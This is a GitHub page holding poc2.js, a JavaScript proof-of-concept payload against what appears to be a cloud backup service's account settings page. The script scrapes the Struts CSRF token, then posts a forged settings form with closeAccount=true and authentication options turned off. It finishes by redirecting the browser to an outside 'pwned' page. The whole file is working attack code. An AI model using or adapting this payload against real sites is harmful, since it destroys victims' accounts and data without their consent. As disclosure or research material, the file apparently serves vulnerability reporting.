-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpoc2.js
26 lines (24 loc) · 1.87 KB
/
poc2.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
var url = "/account_settings.htm";
var xhr = new XMLHttpRequest();
xhr.responseType = "document";
xhr.open("GET", url, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
page = xhr.response
// Get the csrf token from meta tag
token = page.getElementsByName('org.apache.struts.taglib.html.TOKEN')[0].value
// Show the token
console.log("The token is: " + token);
var xhr2 = new XMLHttpRequest();
xhr2.open("POST", "/account_settings.htm", true);
xhr2.setRequestHeader("Content-Type", 'application/x-www-form-urlencoded; charset=UTF-8');
xhr2.send('org.apache.struts.taglib.html.TOKEN='+token+'&originalLangLocale=en_US&signinMethod=never&langLocale=en_US&originalEmailReceipts=false&enabledComputerBackup=on&originalComputerBackup=true&originalB2CloudStorage=false&originalGroups=false&originalEnableSso=false&enableSso=false&oauthSsoProvider=¤tPasswordChangeEmail=&newEmail=&confirmNewEmail=&changeEmail=¤tPassword=&password=&confirmPassword=&changePassword=¤tPasswordChangeSMS=&smsPhoneNumber=&smsSecurityCode%22=&verifiedSmsPhoneNumber=&verifiedSmsCountryCode=&changeSmsPhoneNumber=¤t_verify_email=&verifyEmailSecurityCode%22=&authenticate=never&totpVerificationCode=&genBackupCodes=on&authKey=&totpHash=&originalEnabledSmsFallback=false&removePhoneNumber=&closeAccount=true&changeAuthSettings=&authSettings=&authMethod=&smsBackupCodes=');
xhr2.onload = function(e){
if( xhr2.readyState == XMLHttpRequest.DONE && xhr2.status == 200 )
{
setTimeout(function(){ window.location.href="https://zonduu.me/pwned"; }, 2000);;
}
}
}
};
xhr.send(null);